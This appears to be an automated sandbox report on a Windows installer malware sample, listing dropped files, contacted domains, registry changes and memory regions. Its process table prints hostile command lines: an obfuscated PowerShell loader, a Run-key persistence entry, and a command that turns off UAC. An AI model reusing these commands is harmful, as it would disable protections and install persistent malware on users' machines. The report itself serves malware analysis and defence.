Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
8BoeFOfNMo.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Chalcomenite.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Chalcomenite.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\BgImage.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\UserInfo.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x9b02f762, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\ProgramData\ios\logs.dat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hglr25s.zhl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwplqiwm.22q.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\gldssaneringssagen.ind
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\mellemhandlen.lov
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\nonconcentric.cit
|
OpenPGP Public Key
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\penalisables.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\procenttals.min
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Hairbrained.Adv
|
ASCII text, with very long lines (53804), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Roth.Fri
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\epistropheus.has
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\feriegodtgrelsen.che
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 13 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\8BoeFOfNMo.exe
|
"C:\Users\user\Desktop\8BoeFOfNMo.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle minimized "$Hovedgrdes=Get-Content 'C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Hairbrained.Adv';$Nrlst=$Hovedgrdes.SubString(3639,3);.$Nrlst($Hovedgrdes)"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Chalcomenite.exe
|
"C:\Users\user\AppData\Local\Temp\Chalcomenite.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Polychotomy% -windowstyle minimized $Preexposure=(Get-ItemProperty -Path 'HKCU:\Exundance\').Veterinren;%Polychotomy%
($Preexposure)"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Polychotomy% -windowstyle
minimized $Preexposure=(Get-ItemProperty -Path 'HKCU:\Exundance\').Veterinren;%Polychotomy% ($Preexposure)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
Zjjnrg.line.pm
|
|
||
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://drive.google.com/d
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jnrg.line.pm
|
194.59.30.244
|
|
|
|
drive.google.com
|
142.250.185.238
|
||
|
drive.usercontent.google.com
|
216.58.206.33
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
194.59.30.244
|
jnrg.line.pm
|
Germany
|
|
|
|
216.58.206.33
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.185.238
|
drive.google.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
|
EnableLUA
|
|
|
|
HKEY_CURRENT_USER\Exundance
|
Veterinren
|
||
|
HKEY_CURRENT_USER\Environment
|
Polychotomy
|
||
|
HKEY_CURRENT_USER\SOFTWARE\-4JAT38
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\-4JAT38
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\-4JAT38
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
6C3B000
|
heap
|
page read and write
|
|
|
|
B72B000
|
direct allocation
|
page execute and read and write
|
|
|
|
5AC9000
|
trusted library allocation
|
page read and write
|
||
|
88D0000
|
heap
|
page read and write
|
||
|
4AA1000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C306000
|
heap
|
page read and write
|
||
|
701000
|
heap
|
page read and write
|
||
|
A32B000
|
direct allocation
|
page execute and read and write
|
||
|
DDB3CFE000
|
stack
|
page read and write
|
||
|
22EF0000
|
heap
|
page read and write
|
||
|
DDB4C7E000
|
unkown
|
page readonly
|
||
|
2CA1C110000
|
trusted library allocation
|
page read and write
|
||
|
DDB2D7E000
|
unkown
|
page readonly
|
||
|
2CA1C2F6000
|
heap
|
page read and write
|
||
|
2CA16C91000
|
heap
|
page read and write
|
||
|
6E8E3000
|
unkown
|
page read and write
|
||
|
DDB3B7E000
|
unkown
|
page readonly
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
6E8E2000
|
unkown
|
page readonly
|
||
|
2CA1C460000
|
trusted library allocation
|
page read and write
|
||
|
2CA16C96000
|
heap
|
page read and write
|
||
|
9D000
|
stack
|
page read and write
|
||
|
2CA1C2E7000
|
heap
|
page read and write
|
||
|
235D000
|
stack
|
page read and write
|
||
|
727D000
|
heap
|
page read and write
|
||
|
DDB3BFE000
|
stack
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
2CA17502000
|
heap
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
2CA173A1000
|
trusted library allocation
|
page read and write
|
||
|
23BF000
|
stack
|
page read and write
|
||
|
DDB4BFE000
|
stack
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
724C000
|
heap
|
page read and write
|
||
|
2CA16C13000
|
heap
|
page read and write
|
||
|
DDB317E000
|
stack
|
page read and write
|
||
|
5E0B000
|
remote allocation
|
page execute and read and write
|
||
|
DDB307E000
|
unkown
|
page readonly
|
||
|
2CA16D02000
|
heap
|
page read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
8472000
|
heap
|
page read and write
|
||
|
299D000
|
stack
|
page read and write
|
||
|
2C87000
|
heap
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
813E000
|
stack
|
page read and write
|
||
|
6C66000
|
heap
|
page read and write
|
||
|
2CA16C74000
|
heap
|
page read and write
|
||
|
535000
|
heap
|
page read and write
|
||
|
2CA1C200000
|
heap
|
page read and write
|
||
|
359B000
|
heap
|
page read and write
|
||
|
AD2B000
|
direct allocation
|
page execute and read and write
|
||
|
6CAE000
|
heap
|
page read and write
|
||
|
2CA0000
|
trusted library section
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
6CA0000
|
direct allocation
|
page read and write
|
||
|
DDB3F7E000
|
unkown
|
page readonly
|
||
|
180B000
|
remote allocation
|
page execute and read and write
|
||
|
6B9F000
|
stack
|
page read and write
|
||
|
2CA1C260000
|
trusted library allocation
|
page read and write
|
||
|
2E4E000
|
stack
|
page read and write
|
||
|
2CA1C30A000
|
heap
|
page read and write
|
||
|
71A0000
|
heap
|
page read and write
|
||
|
360B000
|
remote allocation
|
page execute and read and write
|
||
|
2CA17D40000
|
trusted library section
|
page readonly
|
||
|
DDB377C000
|
stack
|
page read and write
|
||
|
43F000
|
unkown
|
page readonly
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
CB2B000
|
direct allocation
|
page execute and read and write
|
||
|
6C5E000
|
heap
|
page read and write
|
||
|
6C8E000
|
heap
|
page read and write
|
||
|
DDB2CFE000
|
stack
|
page read and write
|
||
|
43F000
|
unkown
|
page readonly
|
||
|
43D000
|
unkown
|
page read and write
|
||
|
2CA17C20000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
6C65000
|
heap
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
8840000
|
direct allocation
|
page read and write
|
||
|
6F6000
|
heap
|
page read and write
|
||
|
303D000
|
stack
|
page read and write
|
||
|
2B80000
|
direct allocation
|
page read and write
|
||
|
6D30000
|
direct allocation
|
page read and write
|
||
|
22B40000
|
direct allocation
|
page read and write
|
||
|
2357D000
|
stack
|
page read and write
|
||
|
2CA1C450000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C1F0000
|
trusted library allocation
|
page read and write
|
||
|
8FE7000
|
trusted library allocation
|
page read and write
|
||
|
27C8000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
8DF0000
|
direct allocation
|
page execute and read and write
|
||
|
80FE000
|
stack
|
page read and write
|
||
|
8890000
|
direct allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
DDB327E000
|
unkown
|
page readonly
|
||
|
DDB457C000
|
stack
|
page read and write
|
||
|
DDB3C7E000
|
unkown
|
page readonly
|
||
|
321E000
|
stack
|
page read and write
|
||
|
6CB0000
|
direct allocation
|
page read and write
|
||
|
16D0000
|
remote allocation
|
page execute and read and write
|
||
|
6CA4000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
2CA17402000
|
heap
|
page read and write
|
||
|
71FC000
|
heap
|
page read and write
|
||
|
5C4D000
|
trusted library allocation
|
page read and write
|
||
|
845F000
|
heap
|
page read and write
|
||
|
2CA1C100000
|
trusted library allocation
|
page read and write
|
||
|
2CA16BA0000
|
trusted library section
|
page read and write
|
||
|
2CA16D00000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2CA1C22C000
|
heap
|
page read and write
|
||
|
6F60000
|
heap
|
page read and write
|
||
|
2CF5000
|
trusted library allocation
|
page execute and read and write
|
||
|
232FC000
|
stack
|
page read and write
|
||
|
22CBF000
|
stack
|
page read and write
|
||
|
32F8000
|
heap
|
page read and write
|
||
|
6C6C000
|
heap
|
page read and write
|
||
|
6C6C000
|
heap
|
page read and write
|
||
|
8680000
|
trusted library allocation
|
page read and write
|
||
|
DDB397B000
|
stack
|
page read and write
|
||
|
DDB387E000
|
unkown
|
page readonly
|
||
|
430000
|
unkown
|
page read and write
|
||
|
DDB437B000
|
stack
|
page read and write
|
||
|
2BF0000
|
direct allocation
|
page read and write
|
||
|
264E000
|
heap
|
page read and write
|
||
|
711E000
|
stack
|
page read and write
|
||
|
2CA1C110000
|
trusted library allocation
|
page read and write
|
||
|
D52B000
|
direct allocation
|
page execute and read and write
|
||
|
4FE000
|
stack
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
DDB2F77000
|
stack
|
page read and write
|
||
|
843A000
|
heap
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
C12B000
|
direct allocation
|
page execute and read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
29DD000
|
stack
|
page read and write
|
||
|
22E0E000
|
stack
|
page read and write
|
||
|
2CA1C264000
|
heap
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page read and write
|
||
|
2F4B000
|
stack
|
page read and write
|
||
|
8870000
|
direct allocation
|
page read and write
|
||
|
7279000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
5C34000
|
trusted library allocation
|
page read and write
|
||
|
224BD000
|
stack
|
page read and write
|
||
|
2CA17513000
|
heap
|
page read and write
|
||
|
22B70000
|
direct allocation
|
page read and write
|
||
|
22F3D000
|
stack
|
page read and write
|
||
|
355E000
|
stack
|
page read and write
|
||
|
65E000
|
stack
|
page read and write
|
||
|
2DB7000
|
heap
|
page read and write
|
||
|
2CA1C1E0000
|
trusted library allocation
|
page read and write
|
||
|
DDB2E7E000
|
unkown
|
page readonly
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
2CA16C7E000
|
heap
|
page read and write
|
||
|
8057000
|
stack
|
page read and write
|
||
|
2CA17500000
|
heap
|
page read and write
|
||
|
220B000
|
remote allocation
|
page execute and read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
6F20000
|
heap
|
page read and write
|
||
|
8488000
|
heap
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
8630000
|
trusted library allocation
|
page execute and read and write
|
||
|
19E000
|
stack
|
page read and write
|
||
|
2353F000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
2BB0000
|
direct allocation
|
page read and write
|
||
|
2CA16B90000
|
trusted library allocation
|
page read and write
|
||
|
DDB347E000
|
unkown
|
page readonly
|
||
|
2662000
|
heap
|
page read and write
|
||
|
72A7000
|
heap
|
page read and write
|
||
|
2317F000
|
stack
|
page read and write
|
||
|
223BD000
|
stack
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
2CC4000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C4B0000
|
remote allocation
|
page read and write
|
||
|
DDB3A7E000
|
unkown
|
page readonly
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
DDB337C000
|
stack
|
page read and write
|
||
|
7296000
|
heap
|
page read and write
|
||
|
8430000
|
heap
|
page read and write
|
||
|
2CA1C154000
|
trusted library allocation
|
page read and write
|
||
|
2CA16C79000
|
heap
|
page read and write
|
||
|
228DE000
|
stack
|
page read and write
|
||
|
74CE000
|
stack
|
page read and write
|
||
|
6BDE000
|
stack
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
43F000
|
unkown
|
page readonly
|
||
|
2CA16C00000
|
heap
|
page read and write
|
||
|
87F0000
|
direct allocation
|
page read and write
|
||
|
2CA1C313000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
22B60000
|
direct allocation
|
page read and write
|
||
|
DDB2DFF000
|
stack
|
page read and write
|
||
|
2CA1C244000
|
heap
|
page read and write
|
||
|
DDB367E000
|
unkown
|
page readonly
|
||
|
DDB3DFE000
|
stack
|
page read and write
|
||
|
2F9E000
|
stack
|
page read and write
|
||
|
2CA16D29000
|
heap
|
page read and write
|
||
|
72DE000
|
heap
|
page read and write
|
||
|
2BA0000
|
direct allocation
|
page read and write
|
||
|
6C1F000
|
stack
|
page read and write
|
||
|
2CA1C302000
|
heap
|
page read and write
|
||
|
22EDF000
|
stack
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
2CF0000
|
trusted library allocation
|
page read and write
|
||
|
8453000
|
heap
|
page read and write
|
||
|
2CCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D10000
|
trusted library allocation
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
2CA1C2E2000
|
heap
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
225D000
|
stack
|
page read and write
|
||
|
8800000
|
direct allocation
|
page read and write
|
||
|
6C8E000
|
heap
|
page read and write
|
||
|
2CA1C25D000
|
heap
|
page read and write
|
||
|
225FF000
|
stack
|
page read and write
|
||
|
2CA180A0000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C0F0000
|
trusted library allocation
|
page read and write
|
||
|
DDB3EFE000
|
stack
|
page read and write
|
||
|
71B7000
|
trusted library allocation
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page execute and read and write
|
||
|
8AF000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
71EF000
|
heap
|
page read and write
|
||
|
2303C000
|
stack
|
page read and write
|
||
|
71E0000
|
heap
|
page read and write
|
||
|
2CA16C41000
|
heap
|
page read and write
|
||
|
8486000
|
heap
|
page read and write
|
||
|
7480000
|
heap
|
page execute and read and write
|
||
|
2EAE000
|
stack
|
page read and write
|
||
|
2CA1C2D2000
|
heap
|
page read and write
|
||
|
325E000
|
stack
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
2DED000
|
stack
|
page read and write
|
||
|
2640000
|
heap
|
page read and write
|
||
|
4A0B000
|
remote allocation
|
page execute and read and write
|
||
|
DDB41FE000
|
stack
|
page read and write
|
||
|
720C000
|
heap
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page read and write
|
||
|
DDB3E7E000
|
unkown
|
page readonly
|
||
|
3580000
|
heap
|
page read and write
|
||
|
400B000
|
remote allocation
|
page execute and read and write
|
||
|
8810000
|
direct allocation
|
page read and write
|
||
|
2343D000
|
stack
|
page read and write
|
||
|
2CA1C257000
|
heap
|
page read and write
|
||
|
22D0E000
|
stack
|
page read and write
|
||
|
2CC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
71C7000
|
heap
|
page read and write
|
||
|
72A4000
|
heap
|
page read and write
|
||
|
2CA1C1E0000
|
trusted library allocation
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
84B7000
|
heap
|
page read and write
|
||
|
325D000
|
stack
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
DDB467E000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
31DE000
|
stack
|
page read and write
|
||
|
2EB0000
|
heap
|
page readonly
|
||
|
4FDB000
|
trusted library allocation
|
page read and write
|
||
|
2CA17D50000
|
trusted library section
|
page readonly
|
||
|
2CA17415000
|
heap
|
page read and write
|
||
|
2410000
|
heap
|
page read and write
|
||
|
4BE000
|
stack
|
page read and write
|
||
|
6BD7000
|
heap
|
page read and write
|
||
|
84A6000
|
heap
|
page read and write
|
||
|
2CA17A40000
|
trusted library allocation
|
page read and write
|
||
|
6E8000
|
heap
|
page read and write
|
||
|
229DF000
|
stack
|
page read and write
|
||
|
2CA1C300000
|
heap
|
page read and write
|
||
|
758D000
|
stack
|
page read and write
|
||
|
5B09000
|
trusted library allocation
|
page read and write
|
||
|
2E8F000
|
stack
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
351E000
|
unkown
|
page read and write
|
||
|
233FF000
|
stack
|
page read and write
|
||
|
DDB3FFE000
|
stack
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
2CA1751A000
|
heap
|
page read and write
|
||
|
8880000
|
direct allocation
|
page read and write
|
||
|
6ADE000
|
stack
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C150000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
2CA16B50000
|
heap
|
page read and write
|
||
|
2CA16CA9000
|
heap
|
page read and write
|
||
|
8185000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
2D38000
|
heap
|
page read and write
|
||
|
231BB000
|
stack
|
page read and write
|
||
|
6B8000
|
heap
|
page read and write
|
||
|
329F000
|
stack
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
DDB3AFE000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2CA1C21F000
|
heap
|
page read and write
|
||
|
2CA17D20000
|
trusted library section
|
page readonly
|
||
|
2CA1C2D4000
|
heap
|
page read and write
|
||
|
2CEA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B46000
|
heap
|
page read and write
|
||
|
6E8E1000
|
unkown
|
page execute read
|
||
|
835C000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
6C69000
|
heap
|
page read and write
|
||
|
42A000
|
unkown
|
page read and write
|
||
|
2CA1C111000
|
trusted library allocation
|
page read and write
|
||
|
DDB40FE000
|
stack
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FC000
|
stack
|
page read and write
|
||
|
6D40000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
2F1C000
|
stack
|
page read and write
|
||
|
6B0000
|
heap
|
page read and write
|
||
|
6D20000
|
direct allocation
|
page read and write
|
||
|
2B50000
|
direct allocation
|
page read and write
|
||
|
2CD9000
|
trusted library allocation
|
page read and write
|
||
|
540B000
|
remote allocation
|
page execute and read and write
|
||
|
2CA1C293000
|
heap
|
page read and write
|
||
|
2CA1751A000
|
heap
|
page read and write
|
||
|
DDB417E000
|
unkown
|
page readonly
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
2D9F000
|
stack
|
page read and write
|
||
|
6BFE000
|
heap
|
page read and write
|
||
|
6C95000
|
heap
|
page execute and read and write
|
||
|
8080000
|
heap
|
page read and write
|
||
|
DDB427E000
|
unkown
|
page readonly
|
||
|
2BE0000
|
direct allocation
|
page read and write
|
||
|
2CB0000
|
trusted library allocation
|
page read and write
|
||
|
2BD0000
|
direct allocation
|
page read and write
|
||
|
2CA16C7C000
|
heap
|
page read and write
|
||
|
8830000
|
direct allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
6BB0000
|
heap
|
page read and write
|
||
|
2CA17701000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C251000
|
heap
|
page read and write
|
||
|
2FB6000
|
heap
|
page read and write
|
||
|
22B50000
|
direct allocation
|
page read and write
|
||
|
6B1F000
|
stack
|
page read and write
|
||
|
8820000
|
direct allocation
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
B15000
|
heap
|
page read and write
|
||
|
2CA16C8F000
|
heap
|
page read and write
|
||
|
2CA17400000
|
heap
|
page read and write
|
||
|
5C47000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C140000
|
trusted library allocation
|
page read and write
|
||
|
2C90000
|
trusted library section
|
page read and write
|
||
|
70DE000
|
stack
|
page read and write
|
||
|
706000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
2CA1C440000
|
trusted library allocation
|
page read and write
|
||
|
88A0000
|
direct allocation
|
page read and write
|
||
|
992B000
|
direct allocation
|
page execute and read and write
|
||
|
6E8E4000
|
unkown
|
page readonly
|
||
|
A60000
|
heap
|
page read and write
|
||
|
6CA8000
|
heap
|
page read and write
|
||
|
DDB29AB000
|
stack
|
page read and write
|
||
|
8850000
|
direct allocation
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
2FA8000
|
heap
|
page read and write
|
||
|
6FC000
|
heap
|
page read and write
|
||
|
2B60000
|
direct allocation
|
page read and write
|
||
|
285F000
|
stack
|
page read and write
|
||
|
6C8E000
|
heap
|
page read and write
|
||
|
264B000
|
heap
|
page read and write
|
||
|
6C6C000
|
heap
|
page read and write
|
||
|
8450000
|
heap
|
page read and write
|
||
|
81D0000
|
trusted library allocation
|
page read and write
|
||
|
72DA000
|
heap
|
page read and write
|
||
|
DDB447E000
|
unkown
|
page readonly
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C270000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
direct allocation
|
page read and write
|
||
|
2CA1C130000
|
trusted library allocation
|
page read and write
|
||
|
680B000
|
remote allocation
|
page execute and read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
2CA173E0000
|
trusted library allocation
|
page read and write
|
||
|
87E0000
|
direct allocation
|
page read and write
|
||
|
839C000
|
stack
|
page read and write
|
||
|
2CA16D13000
|
heap
|
page read and write
|
||
|
22E60000
|
remote allocation
|
page read and write
|
||
|
2CA1C16E000
|
trusted library allocation
|
page read and write
|
||
|
2CA1D000000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
6C69000
|
heap
|
page read and write
|
||
|
2CA1C140000
|
trusted library allocation
|
page read and write
|
||
|
81E0000
|
trusted library allocation
|
page read and write
|
||
|
6C56000
|
heap
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
6CA8000
|
heap
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page read and write
|
||
|
9AF000
|
stack
|
page read and write
|
||
|
5AA1000
|
trusted library allocation
|
page read and write
|
||
|
6CA7000
|
heap
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
2CA1C302000
|
heap
|
page read and write
|
||
|
DDB407E000
|
unkown
|
page readonly
|
||
|
81C0000
|
trusted library allocation
|
page read and write
|
||
|
2665000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page execute and read and write
|
||
|
8860000
|
direct allocation
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
6C90000
|
heap
|
page execute and read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
754E000
|
stack
|
page read and write
|
||
|
3890000
|
heap
|
page read and write
|
||
|
2CA16B60000
|
heap
|
page read and write
|
||
|
2CA17D00000
|
trusted library section
|
page readonly
|
||
|
2E6E000
|
stack
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
6CA8000
|
heap
|
page read and write
|
||
|
2CA1755A000
|
heap
|
page read and write
|
||
|
22350000
|
heap
|
page read and write
|
||
|
2CA1C2F4000
|
heap
|
page read and write
|
||
|
6CA8000
|
heap
|
page read and write
|
||
|
35B5000
|
heap
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
750E000
|
stack
|
page read and write
|
||
|
6C8E000
|
heap
|
page read and write
|
||
|
2CA1C4B0000
|
remote allocation
|
page read and write
|
||
|
76CB000
|
stack
|
page read and write
|
||
|
7EEF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
6E8E0000
|
unkown
|
page readonly
|
||
|
6BD0000
|
heap
|
page read and write
|
||
|
